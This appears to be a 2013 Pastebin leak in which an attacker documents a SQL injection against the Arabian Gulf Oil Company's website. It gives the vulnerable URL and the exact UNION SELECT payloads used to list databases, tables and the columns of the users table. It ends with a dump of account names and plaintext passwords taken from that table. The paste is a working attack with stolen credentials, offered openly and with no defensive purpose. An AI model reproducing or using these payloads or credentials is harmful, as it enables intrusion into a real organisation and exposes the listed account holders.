Guest User

Arabian Gulf Oil Company SQL injection // QuisterTow

a guest
Mar 6th, 2013
343
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ==========
  2. Target : http://www.agoco.com.ly/ [Arabian Gulf Oil Company]
  3. Author : QuisterTow / twitter.com/quistertow
  4. Hour : 17:58
  5. Date : 6 march 2013
  6. ==========
  7. /*!DATABASES*/
  8.  
  9. information_schema
  10. agococo_agoco - current database
  11. agococo_agoen
  12.  
  13. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name) from information_schema.schemata-- -
  14.  
  15. /*!end*/
  16.  
  17. /*!TABLES*/
  18.  
  19. AIRLINES_SCEDULE
  20. USERS_ACCESS_RIGHT
  21. airlines
  22. artical
  23. category
  24. client_category
  25. clients
  26. economic_services
  27. es_daily_actions
  28. es_items
  29. guest_book
  30. nationalty_cd
  31. occupation
  32. order_category
  33. order_items
  34. oreder_header
  35. page_customization
  36. professional_cd
  37. users
  38. vacancies_need
  39. vote_a
  40. vote_q
  41.  
  42. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(/*!table_name*/) from information_schema.tables where table_schema=database()-- -
  43.  
  44. /*!end*/
  45.  
  46. /*!USERS COLUMNS */
  47.  
  48. id
  49. user_nm
  50. user_id
  51. user_password
  52. admin_fg
  53. active_fg
  54. news_fg
  55. tenders_fg
  56. events_fg
  57. env_fg
  58. presentation_fg
  59. project_fg
  60. traning_fg
  61. chairman_fg
  62. super_user
  63. careers_fg
  64. magazine_fg
  65. conference_fg
  66. business_fg
  67. about_fg
  68. libya_fg
  69. link_fg
  70. travel_fg
  71. vacancies_fg
  72. benefits_fg
  73. community_fg
  74. applying_fg
  75. annoucments_fg
  76. exploration_fg
  77.  
  78. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(/*!column_name*/) from information_schema.columns where /*!table_name*/=0x7573657273-- -
  79.  
  80. /*!END*/
  81.  
  82. /*!DATA -- user and password */
  83. admin:ecs747:
  84. sofian shibani:123456:
  85. intisar:ecs747:
  86. hak:nimb:
  87. agoco admin:ecs747:
  88.  
  89. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(user_nm,0x3a,/*!user_password*/,0x3a) from users-- -
  90.  
  91. /*!end*/
  92.  
  93.  
  94. That's all
  95.  
  96. QuisterTow
RAW Paste Data